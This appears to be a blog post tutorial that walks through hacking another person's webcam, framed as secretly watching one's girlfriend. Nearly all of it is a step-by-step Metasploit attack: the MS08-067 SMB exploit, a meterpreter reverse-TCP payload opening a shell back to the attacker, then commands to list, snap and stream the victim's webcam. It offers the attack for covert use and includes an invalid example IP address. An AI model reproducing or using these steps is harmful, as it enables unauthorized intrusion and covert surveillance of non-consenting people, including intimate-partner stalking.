How to hack a Webcamera of another person
Imagine this your girlfriend is on a computer or a Lappy and is doing
crazy shit over her laptop.Believe me you can see it all,sitting on your computer,
in your toilet room.
The tutorial requires Metasploit (used by hackers to control your
computer and do other shit)
OR you can use backtrack (which has an inbuilt metasploit)
Backtrack is basically a linux operating system (not like widows or anything)
Lol i will try to explain it in the dumbest way possible.
After opening your backtrack operating system(search on google you will find it)
Open terminal and type:......
Code:
msfconsole
2. Next set our exploit:
Code:
use exploit/windows/smb/ms08_067_netapi
3. Set payload and use meterpreter.....
Code:
set PAYLOAD windows/meterpreter/reverse_tcp
4. Set RHOST (target ip).....
Code:
set RHOST (your target adress)e.g set RHOST 192.258.24.1
5.Set LHOST (us).....
Code:
set LHOST 192.155.0.150
6. Now type: ......
Code:
exploit
7. now show what webcam uses: ........
Code:
webcam_list e.g he use Logitech webcam C160
8. Start friend webcam .........
Code:
webcam_snap
Show time........
Code:......
run webcam -p /var/www
starting webcam...
and then go to....
Code:
http://localhost/webcam.htm
BAMN HACKED!
U HAVE DONE IT.......... !!!!!!!!!!
No comments:
Post a Comment